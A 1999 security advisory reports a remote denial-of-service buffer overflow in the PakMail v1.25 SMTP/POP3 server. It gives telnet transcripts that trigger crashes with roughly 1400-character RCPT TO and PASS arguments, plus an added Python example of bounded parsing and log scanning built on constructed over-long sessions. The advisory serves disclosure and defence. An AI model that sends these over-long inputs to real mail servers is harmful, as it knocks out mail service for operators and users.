Vulnerable Program: PakMail v1.25 SMTP/POP3 Server
Platform          : Windows95, 98, NT
Vendor            : SilverSoft Corporation (www.pak.net)
Impact            : Remote/local users can DoS both SMTP & POP3 servers
Found by          : slackee ( warminx@null.rewted.org )
Date              : 5th December '99


PakMail SMTP/POP3 Server
________________________

PakMail v1.25, a state of the art POP3 and SMTP server, brings mail services common on 
Unix hosts and the Internet to Windows-based micro-computers. This server is suited to 
corporate bodies and ISPs dealing in mail management. PakMail provides the following 
features. 

.User friendly maintenance of accounts 
.High performance yet low CPU usage 
.Mail Forwarding 
.Mailing Lists 
.Realtime status information 
.Debug logging 
.Powerful SMTP and POP3 builtin clients 
.Transparent SMTP and POP3 mail gateway. 
.Powerful yet easy management of sub-domains 


Vulnerability
_____________

Rewted Network Security Labs found a local/remote DoS attack against the PakMail SMTP and
POP3 servers. In the SMTP server, the buffer overflow is triggered by a long username
specified in the `RCPT TO:` field.

Example: 

telnet localhost 25
220 jedi PakMail Mail Server ready at Sun, 05 Dec 99
mail from: test@localhost
250 test@localhost Sender Ok
rcpt to: $buffer@localhost

where $buffer is roughly 1390 characters. The server will shut down with an illegal operation
and can no longer be used until restarted. The error is as follows:

PAKMAIL caused an invalid page fault in
module KERNEL32.DLL at 0137:bff9a5d0.
Registers:
EAX=c001743c CS=0137 EIP=bff9a5d0 EFLGS=00010212
EBX=0159ffb8 SS=013f ESP=0149ff38 EBP=014a01d4
ECX=00000000 DS=013f ESI=00000000 FS=4717
EDX=bff7678c ES=013f EDI=bffb8e70 GS=0000
Bytes at CS:EIP:
53 8b 15 7c c2 fb bf 56 89 4d e4 57 89 4d dc 89 
Stack dump:

Likewise, the POP3 server is vulnerable to a similar attack, except that the buffer overflow
occurs when an over-long `pass` field is entered. The buffer for this is approximately 1400
characters. PAKMAIL will crash with an almost identical error.

Example:

telnet localhost 110
+OK PakMail on (jedi) at (Sun, 05 Dec 99)
user test
+OK
pass $buffer

The program will then terminate.
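Both crashes above come from the same class of defect: a protocol argument (the RCPT TO
mailbox, the PASS string) is accepted at any length and copied into a fixed-size buffer.
The following is an added example written for this advisory; it is not PakMail code and
does not come from SilverSoft. It assumes the argument limits of RFC 5321 (SMTP) and
RFC 1939 (POP3), and the two sample sessions are constructed to mirror the transcripts
above. It shows the bounded parsing a server should perform before an argument reaches
any buffer, and a small scanner that flags over-long commands in captured sessions so an
operator can spot this traffic in logs.

```python
"""Bounded parsing of SMTP RCPT TO and POP3 PASS, plus a session scanner.

Added example, not PakMail code. Limits are assumed from RFC 5321 and
RFC 1939; sample sessions below are constructed, not captured traffic.
"""
import re
from typing import List, Tuple

# RFC 5321 section 4.5.3.1: local-part <= 64 octets, path <= 256 octets,
# command line <= 512 octets including the trailing CRLF.
SMTP_MAX_LINE = 512
SMTP_MAX_PATH = 256
SMTP_MAX_LOCAL = 64
# RFC 1939 section 3: command line <= 255 octets, each argument <= 40 octets.
POP3_MAX_LINE = 255
POP3_MAX_ARG = 40

_RCPT_RE = re.compile(r"^RCPT\s+TO:\s*<?([^<>\s]+)>?\s*$", re.IGNORECASE)


def check_smtp_rcpt(line: str) -> Tuple[bool, str]:
    """Validate one RCPT TO command line; return (accepted, reply).

    Every length check happens on the received text before anything is
    stored, so an over-long recipient never reaches a fixed buffer.
    """
    raw = line.rstrip("\r\n")
    if len(raw) + 2 > SMTP_MAX_LINE:  # +2 accounts for the CRLF the client sent
        return False, "500 5.5.2 Line too long"
    m = _RCPT_RE.match(raw)
    if not m:
        return False, "501 5.5.4 Syntax error in parameters"
    path = m.group(1)
    if len(path) > SMTP_MAX_PATH:
        return False, "501 5.5.4 Path too long"
    local, sep, domain = path.rpartition("@")
    if not sep or not local or not domain:
        return False, "501 5.1.3 Bad recipient address syntax"
    if len(local) > SMTP_MAX_LOCAL:
        return False, "501 5.1.3 Local-part too long"
    return True, f"250 {path} Recipient Ok"


def check_pop3_pass(line: str) -> Tuple[bool, str]:
    """Validate one PASS command line; return (accepted, reply)."""
    raw = line.rstrip("\r\n")
    if len(raw) + 2 > POP3_MAX_LINE:
        return False, "-ERR line too long"
    parts = raw.split(" ", 1)
    if parts[0].upper() != "PASS" or len(parts) != 2 or not parts[1]:
        return False, "-ERR syntax: PASS <password>"
    if len(parts[1]) > POP3_MAX_ARG:
        return False, "-ERR argument too long"
    return True, "+OK"  # a real server would now compare against the stored secret


# Detection side: argument limits per client verb, used when scanning logs.
_ARG_LIMIT = {
    "RCPT": SMTP_MAX_PATH, "MAIL": SMTP_MAX_PATH,
    "USER": POP3_MAX_ARG, "PASS": POP3_MAX_ARG,
}


def scan_session(lines: List[str]) -> List[str]:
    """Return one alert per client command whose argument exceeds its limit.

    Server replies (numeric SMTP codes, +OK, -ERR) are skipped so the
    scanner can run over a full logged dialogue.
    """
    alerts = []
    for n, line in enumerate(lines, 1):
        text = line.strip()
        if not text or text[0].isdigit() or text.startswith(("+OK", "-ERR")):
            continue
        verb, _, arg = text.partition(" ")
        verb = verb.upper()
        # Drop the "TO:" / "FROM:" keyword so only the path itself is measured.
        arg = re.sub(r"^(TO|FROM):\s*", "", arg.strip(), flags=re.IGNORECASE)
        limit = _ARG_LIMIT.get(verb)
        if limit is not None and len(arg) > limit:
            alerts.append(f"line {n}: {verb} argument is {len(arg)} bytes (limit {limit})")
    return alerts


# Constructed sessions modelled on the advisory's transcripts (not real captures).
SMTP_SESSION = [
    "220 jedi PakMail Mail Server ready",
    "mail from: test@localhost",
    "250 test@localhost Sender Ok",
    "rcpt to: " + "A" * 1390 + "@localhost",  # over-long recipient, constructed
]
POP3_SESSION = [
    "+OK PakMail on (jedi)",
    "user test",
    "+OK",
    "pass " + "B" * 1400,  # over-long password, constructed
]

if __name__ == "__main__":
    for session in (SMTP_SESSION, POP3_SESSION):
        for alert in scan_session(session):
            print(alert)
    print(check_smtp_rcpt(SMTP_SESSION[3]))
    print(check_pop3_pass(POP3_SESSION[3]))
```

The server-side checks reject the over-long line with a protocol error and keep
serving, which is the behaviour a patched release should show; the scanner gives an
operator a way to find the same pattern in existing session logs.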


Solution
________

SilverSoft Corporation has been notified about this, so either wait for a patched release
or switch SMTP/POP3 servers.

________________________________________________________
r e w t e d   n e t w o r k   s e c u r i t y   l a b s
http://www.rewted.org